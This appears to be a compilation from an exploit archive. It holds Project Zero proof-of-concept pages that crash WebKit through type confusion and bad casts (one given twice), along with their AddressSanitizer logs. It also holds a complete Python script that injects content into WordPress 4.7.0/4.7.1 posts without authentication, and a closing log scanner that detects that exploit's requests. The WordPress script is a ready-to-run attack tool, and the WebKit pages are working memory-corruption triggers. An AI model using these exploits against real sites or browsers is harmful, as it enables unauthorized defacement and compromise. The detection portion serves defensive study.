    #7 0x109145b80 in WebCore::HTMLFormElement::registerFormElement(WebCore::FormAssociatedElement*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc2cb80)
    #8 0x108ef9f98 in WebCore::FormAssociatedElement::setForm(WebCore::HTMLFormElement*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x9e0f98)
    #9 0x108efa25c in WebCore::FormAssociatedElement::insertedInto(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x9e125c)
    #10 0x10913ae30 in WebCore::HTMLFormControlElement::insertedInto(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc21e30)
    #11 0x10920b5c7 in WebCore::HTMLTextFormControlElement::insertedInto(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xcf25c7)
    #12 0x1091639f8 in WebCore::HTMLInputElement::insertedInto(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc4a9f8)
    #13 0x108893436 in WebCore::notifyNodeInsertedIntoDocument(WebCore::ContainerNode&, WebCore::Node&, WTF::Vector<WTF::Ref<WebCore::Node>, 11ul, WTF::CrashOnOverflow, 16ul>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x37a436)
    #14 0x1088932d8 in WebCore::notifyChildNodeInserted(WebCore::ContainerNode&, WebCore::Node&, WTF::Vector<WTF::Ref<WebCore::Node>, 11ul, WTF::CrashOnOverflow, 16ul>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x37a2d8)
    #15 0x108882697 in WebCore::ContainerNode::notifyChildInserted(WebCore::Node&, WebCore::ContainerNode::ChildChangeSource) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x369697)
    #16 0x1088810ba in WebCore::ContainerNode::parserAppendChild(WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x3680ba)
    #17 0x1090de9dc in WebCore::executeInsertTask(WebCore::HTMLConstructionSiteTask&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbc59dc)
    #18 0x1090d7947 in WebCore::HTMLConstructionSite::executeQueuedTasks() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbbe947)
    #19 0x109108828 in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbef828)
    #20 0x1091083e2 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbef3e2)
    #21 0x109107614 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbee614)
    #22 0x10910906d in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbf006d)
    #23 0x108b6e4a1 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6554a1)
    #24 0x108ca0138 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x787138)
    #25 0x108c645ef in WebCore::DocumentLoader::finishedLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x74b5ef)
    #26 0x10876f577 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x256577)
    #27 0x10876a479 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x251479)
    #28 0x10acc2f84 in WebCore::SubresourceLoader::didFinishLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x27a9f84)
    #29 0x101662f95 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(double)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(double)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x8def95)

SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc2be27) in WebCore::HTMLFormElement::reset()
==1963==ABORTING
-->
            
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=994

Chrome bug:
https://bugs.chromium.org/p/chromium/issues/detail?id=666246

PoC:
-->

<keygen id="keygen_element" style="position:absolute; height: 100px; width: 100px;">
<script>
var range = document.caretRangeFromPoint(50, 50);
var shadow_tree_container = range.commonAncestorContainer;
shadow_tree_container.prepend("foo");
keygen_element.disabled = true;
</script>

<!--
What happens here:
1. caretRangeFromPoint() allows accessing (and modifying) userAgentShadowRoot from JavaScript
2. HTMLKeygenElement::shadowSelect() blindly casts the first child of the userAgentShadowRoot to HTMLSelectElement without checking the Node type.
-->
            
<!-- Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=999 -->

<keygen id="keygen_element" style="position:absolute; height: 100px; width: 100px;">
<script>
var range = document.caretRangeFromPoint(50, 50);
var shadow_tree_container = range.commonAncestorContainer;
shadow_tree_container.prepend("foo");
keygen_element.disabled = true;
</script>

<!--
What happens here:
1. caretRangeFromPoint() allows accessing (and modifying) userAgentShadowRoot from JavaScript
2. HTMLKeygenElement::shadowSelect() blindly casts the first child of the userAgentShadowRoot to HTMLSelectElement without checking the Node type.
-->
            
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1038

There is a type confusion vulnerability that affects WebKit with accessibility enabled (WebCore::AXObjectCache::gAccessibilityEnabled).

PoC:

===============================
-->

<script>
function boom() {
  m.append("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa");
  m.setAttribute("aria-labeledby", "t");
  d.open = false;
}
</script>
<body onload=boom()>
<title id="t">foo</title>
<menu id="m">
<details id="d" open="true">

<!--
===============================


Bad cast happens in RenderBox.h in

inline RenderBox* RenderBox::firstChildBox() const
{
  return downcast<RenderBox>(firstChild());
}

The function expects that the first child is going to be of type RenderBox, but in the PoC it is actually of type RenderText.

This was tested on WebKitGTK+ 2.14.2 (latest stable version at this time). The PoC also crashes Safari on Mac, but only if the PoC is run while the Web Inspector / Error Console are enabled. It appears this behavior is caused by the fact that opening inspector enables accessibility features (via a call to AXObjectCache::enableAccessibility), while accessibility features are enabled in WebKitGTK+ by default through WebPageAccessibilityObjectAtk.

ASAN log follows.

=================================================================
==5530==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7fd724fdca78 at pc 0x7fd72289499f bp 0x7ffc9e7a40b0 sp 0x7ffc9e7a40a8
READ of size 8 at 0x7fd724fdca78 thread T0
    #0 0x7fd72289499e in WebCore::RenderBox::computeBlockDirectionMargins(WebCore::RenderBlock const&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) const /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBox.cpp:3260:21
    #1 0x7fd7228a00b1 in WebCore::RenderBox::computeAndSetBlockDirectionMargins(WebCore::RenderBlock const&) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBox.cpp:3270:5
    #2 0x7fd7227faa45 in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlockFlow.cpp:660:5
    #3 0x7fd7227f6abe in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlockFlow.cpp:632:9
    #4 0x7fd7227f2d55 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlockFlow.cpp:487:9
    #5 0x7fd7227a24b7 in WebCore::RenderBlock::layout() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlock.cpp:1075:5
    #6 0x7fd7227fb3a0 in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlockFlow.cpp:709:9
    #7 0x7fd7227f6abe in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlockFlow.cpp:632:9
    #8 0x7fd7227f2d55 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlockFlow.cpp:487:9
    #9 0x7fd7227a24b7 in WebCore::RenderBlock::layout() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlock.cpp:1075:5
    #10 0x7fd7227fb3a0 in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlockFlow.cpp:709:9
    #11 0x7fd7227f6abe in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlockFlow.cpp:632:9
    #12 0x7fd7227f2d55 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlockFlow.cpp:487:9
    #13 0x7fd7227a24b7 in WebCore::RenderBlock::layout() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlock.cpp:1075:5
    #14 0x7fd7227fb3a0 in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlockFlow.cpp:709:9
    #15 0x7fd7227f6abe in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlockFlow.cpp:632:9
    #16 0x7fd7227f2d55 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlockFlow.cpp:487:9
    #17 0x7fd7227a24b7 in WebCore::RenderBlock::layout() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlock.cpp:1075:5
    #18 0x7fd722c7d92f in WebCore::RenderView::layoutContent(WebCore::LayoutState const&) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderView.cpp:244:5
    #19 0x7fd722c7ee64 in WebCore::RenderView::layout() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderView.cpp:370:9
    #20 0x7fd72221b17b in WebCore::FrameView::layout(bool) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/page/FrameView.cpp:1438:9
    #21 0x7fd721495fe2 in WebCore::Document::updateLayout() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/dom/Document.cpp:2007:9
    #22 0x7fd7214a2801 in WebCore::Document::updateLayoutIgnorePendingStylesheets(WebCore::Document::RunPostLayoutTasks) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/dom/Document.cpp:2039:5
    #23 0x7fd721579993 in WebCore::Element::innerText() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/dom/Element.cpp:2518:5
    #24 0x7fd720c6d821 in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/accessibility/AccessibilityNodeObject.cpp:1887:16
    #25 0x7fd720c7695c in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector<WebCore::Element*, 0ul, WTF::CrashOnOverflow, 16ul>&) const /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/accessibility/AccessibilityNodeObject.cpp:1930:44
    #26 0x7fd720c77102 in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/accessibility/AccessibilityNodeObject.cpp:1955:12
    #27 0x7fd720c773e9 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/accessibility/AccessibilityNodeObject.cpp:1166:28
    #28 0x7fd720c773e9 in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/accessibility/AccessibilityNodeObject.cpp:1963
    #29 0x7fd720cc408b in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/accessibility/AccessibilityRenderObject.cpp:1356:9
    #30 0x7fd720cac82c in WebCore::AccessibilityObject::accessibilityIsIgnored() const /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/accessibility/AccessibilityObject.cpp:2978:19
    #31 0x7fd720cab793 in WebCore::AccessibilityObject::notifyIfIgnoredValueChanged() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/accessibility/AccessibilityObject.cpp:2870:22
    #32 0x7fd72279df02 in WebCore::RenderBlock::makeChildrenNonInline(WebCore::RenderObject*) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlock.cpp:707:5
    #33 0x7fd72279d37a in WebCore::RenderBlock::addChildIgnoringContinuation(WebCore::RenderObject*, WebCore::RenderObject*) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlock.cpp:606:9
    #34 0x7fd722eb34fa in WebCore::RenderTreePosition::insert(WebCore::RenderObject&) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/style/RenderTreePosition.h:93:5
    #35 0x7fd722eb34fa in WebCore::RenderTreeUpdater::createRenderer(WebCore::Element&, WebCore::RenderStyle&&) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/style/RenderTreeUpdater.cpp:370
    #36 0x7fd722eaec96 in WebCore::RenderTreeUpdater::updateElementRenderer(WebCore::Element&, WebCore::Style::ElementUpdate&) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/style/RenderTreeUpdater.cpp:283:9
    #37 0x7fd722eac9ad in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/style/RenderTreeUpdater.cpp:173:9
    #38 0x7fd722eabdcf in WebCore::RenderTreeUpdater::commit(std::unique_ptr<WebCore::Style::Update, std::default_delete<WebCore::Style::Update> >) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/style/RenderTreeUpdater.cpp:120:9
    #39 0x7fd7214a045e in WebCore::Document::recalcStyle(WebCore::Style::Change) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/dom/Document.cpp:1936:13
    #40 0x7fd7214a1a4f in WebCore::Document::updateStyleIfNeeded() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/dom/Document.cpp:1982:5
    #41 0x7fd7214a1a4f in WebCore::Document::implicitClose() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/dom/Document.cpp:2807
    #42 0x7fd721f666e8 in WebCore::FrameLoader::checkCallImplicitClose() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/loader/FrameLoader.cpp:870:5
    #43 0x7fd721f666e8 in WebCore::FrameLoader::checkCompleted() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/loader/FrameLoader.cpp:816
    #44 0x7fd721f6101a in WebCore::FrameLoader::finishedParsing() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/loader/FrameLoader.cpp:737:5
    #45 0x7fd7214da906 in WebCore::Document::finishedParsing() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/dom/Document.cpp:5228:9
    #46 0x7fd721c66aca in WebCore::HTMLDocumentParser::end() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/html/parser/HTMLDocumentParser.cpp:406:5
    #47 0x7fd721c66aca in WebCore::HTMLDocumentParser::attemptToRunDeferredScriptsAndEnd() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/html/parser/HTMLDocumentParser.cpp:415
    #48 0x7fd721c66aca in WebCore::HTMLDocumentParser::prepareToStopParsing() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/html/parser/HTMLDocumentParser.cpp:135
    #49 0x7fd721f480d3 in WebCore::DocumentWriter::end() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/loader/DocumentWriter.cpp:269:5
    #50 0x7fd721f20e29 in WebCore::DocumentLoader::finishedLoading(double) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/loader/DocumentLoader.cpp:442:5
    #51 0x7fd721f2a031 in WebCore::DocumentLoader::continueAfterContentPolicy(WebCore::PolicyAction) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/loader/DocumentLoader.cpp:829:13
    #52 0x7fd721f25361 in WebCore::DocumentLoader::responseReceived(WebCore::CachedResource*, WebCore::ResourceResponse const&) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/loader/DocumentLoader.cpp:711:9
    #53 0x7fd721f1b2a9 in WebCore::DocumentLoader::handleSubstituteDataLoadNow() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/loader/DocumentLoader.cpp:477:5
    #54 0x7fd722434521 in WebCore::ThreadTimers::sharedTimerFiredInternal() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/platform/ThreadTimers.cpp:121:9
    #55 0x7fd71f10ff1b in WTF::RunLoop::TimerBase::TimerBase(WTF::RunLoop&)::$_3::operator()(void*) const /home/ifratric/webkit/webkitgtk-2.14.2/Source/WTF/wtf/glib/RunLoopGLib.cpp:162:9
    #56 0x7fd71f10ff1b in WTF::RunLoop::TimerBase::TimerBase(WTF::RunLoop&)::$_3::__invoke(void*) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WTF/wtf/glib/RunLoopGLib.cpp:160
    #57 0x7fd717fcf059 in g_main_context_dispatch (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4a059)
    #58 0x7fd717fcf3ff  (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4a3ff)
    #59 0x7fd717fcf721 in g_main_loop_run (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4a721)
    #60 0x7fd71f10f384 in WTF::RunLoop::run() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WTF/wtf/glib/RunLoopGLib.cpp:94:9
    #61 0x7fd7208b6f98 in int WebKit::ChildProcessMain<WebKit::WebProcess, WebKit::WebProcessMain>(int, char**) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebKit2/Shared/unix/ChildProcessMain.h:61:5
    #62 0x7fd71378b82f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
    #63 0x41a218 in _start (/webkit/libexec/webkit2gtk-4.0/WebKitWebProcess+0x41a218)

0x7fd724fdca78 is located 272 bytes to the right of global variable 'vtable for WebCore::RenderText' defined in '/home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderText.cpp' (0x7fd724fdc400) of size 1384
SUMMARY: AddressSanitizer: global-buffer-overflow /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBox.cpp:3260:21 in WebCore::RenderBox::computeBlockDirectionMargins(WebCore::RenderBlock const&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) const
==5530==ABORTING
-->
            
# 2017 - @leonjza
#
# Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC
# Full bug description: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html

# Usage example:
#
# List available posts:
#
# $ python inject.py http://localhost:8070/
# * Discovering API Endpoint
# * API lives at: http://localhost:8070/wp-json/
# * Getting available posts
#  - Post ID: 1, Title: test, Url: http://localhost:8070/archives/1
#
# Update post with content from a file:
#
# $ cat content
# foo
#
# $ python inject.py http://localhost:8070/ 1 content
# * Discovering API Endpoint
# * API lives at: http://localhost:8070/wp-json/
# * Updating post 1
# * Post updated. Check it out at http://localhost:8070/archives/1
# * Update complete!

import json
import sys
import urllib2

from lxml import etree


def get_api_url(wordpress_url):
    response = urllib2.urlopen(wordpress_url)

    data = etree.HTML(response.read())
    u = data.xpath('//link[@rel="https://api.w.org/"]/@href')[0]

    # check if we have permalinks
    if 'rest_route' in u:
        print(' ! Warning, looks like permalinks are not enabled. This might not work!')

    return u


def get_posts(api_base):
    response = urllib2.urlopen(api_base + 'wp/v2/posts')
    posts = json.loads(response.read())

    for post in posts:
        print(' - Post ID: {0}, Title: {1}, Url: {2}'
              .format(post['id'], post['title']['rendered'], post['link']))


def update_post(api_base, post_id, post_content):
    # more than just the content field can be updated. see the api docs here:
    # https://developer.wordpress.org/rest-api/reference/posts/#update-a-post
    data = json.dumps({
        'content': post_content
    })

    url = api_base + 'wp/v2/posts/{post_id}/?id={post_id}abc'.format(post_id=post_id)
    req = urllib2.Request(url, data, {'Content-Type': 'application/json'})
    response = urllib2.urlopen(req).read()

    print('* Post updated. Check it out at {0}'.format(json.loads(response)['link']))


def print_usage():
    print('Usage: {0} <url> (optional: <post_id> <file with post_content>)'.format(__file__))


if __name__ == '__main__':

    # ensure we have at least a url
    if len(sys.argv) < 2:
        print_usage()
        sys.exit(1)

    # if we have a post id, we need content too
    if 2 < len(sys.argv) < 4:
        print('Please provide a file with post content with a post id')
        print_usage()
        sys.exit(1)

    print('* Discovering API Endpoint')
    api_url = get_api_url(sys.argv[1])
    print('* API lives at: {0}'.format(api_url))

    # if we only have a url, show the posts we have
    if len(sys.argv) < 3:
        print('* Getting available posts')
        get_posts(api_url)

        sys.exit(0)

    # if we get here, we have what we need to update a post!
    print('* Updating post {0}'.format(sys.argv[2]))
    with open(sys.argv[3], 'r') as content:
        new_content = content.readlines()

    update_post(api_url, sys.argv[2], ''.join(new_content))

    print('* Update complete!')
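
A defender-side companion to the script above, added here and not part of @leonjza's PoC: it scans web server access logs for write requests to the single-post route whose `id` query parameter does not match the numeric ID in the path, which is the request shape the script sends (`wp/v2/posts/{post_id}/?id={post_id}abc`), including the `rest_route` form used when permalinks are off. The combined log format, the sample lines and all function names are assumptions made for this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined log format: client ... "METHOD target HTTP/x.y" status ...
LINE_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+" '
    r'(?P<status>\d{3})'
)
# Single-post route as the REST API sees it, e.g. /wp/v2/posts/1/
POST_ROUTE_RE = re.compile(r'^/wp/v2/posts/(?P<post_id>\d+)/?$')
WRITE_METHODS = {"POST", "PUT", "PATCH"}

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [02/Feb/2017:10:01:07 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 5120 "-" "Python-urllib/2.7"
192.0.2.10 - - [02/Feb/2017:10:01:09 +0000] "POST /wp-json/wp/v2/posts/1/?id=1abc HTTP/1.1" 200 2210 "-" "Python-urllib/2.7"
198.51.100.7 - - [02/Feb/2017:10:03:00 +0000] "POST /wp-json/wp/v2/posts/1 HTTP/1.1" 401 98 "-" "Mozilla/5.0"
198.51.100.7 - - [02/Feb/2017:10:03:05 +0000] "POST /index.php?rest_route=/wp/v2/posts/4&id=4x HTTP/1.1" 200 1987 "-" "curl/7.52"
203.0.113.5 - - [02/Feb/2017:10:04:11 +0000] "POST /wp-json/wp/v2/posts/9/?id=9 HTTP/1.1" 200 1500 "-" "Mozilla/5.0"
"""


def rest_route(target):
    """Return (route, query_params) for a REST API request, else None.

    Handles both pretty permalinks (/wp-json/<route>) and the
    ?rest_route=<route> form used when permalinks are disabled.
    """
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    if "rest_route" in params:
        return params["rest_route"][0], params
    if "/wp-json/" in parts.path:
        return "/" + unquote(parts.path.split("/wp-json/", 1)[1]), params
    return None


def check_line(line):
    """Return a finding dict when a write request carries a mismatched id."""
    m = LINE_RE.match(line)
    if not m or m.group("method") not in WRITE_METHODS:
        return None
    rest = rest_route(m.group("target"))
    if rest is None:
        return None
    route, params = rest
    route_match = POST_ROUTE_RE.match(route)
    if not route_match:
        return None
    post_id = route_match.group("post_id")
    for value in params.get("id", []):
        # The route already names the post; an extra id that differs from
        # it (for example "1abc") is the anomaly worth alerting on.
        if value != post_id:
            return {
                "client": m.group("client"),
                "method": m.group("method"),
                "post_id": post_id,
                "id_param": value,
                "status": m.group("status"),
            }
    return None


def scan(log_text):
    """Return all findings for a block of access log text."""
    return [f for f in map(check_line, log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 status on a flagged request means the server accepted the write, so that post's revision history is the next thing to check. Access logs record only the request line, so this check covers the query-string form the script above uses.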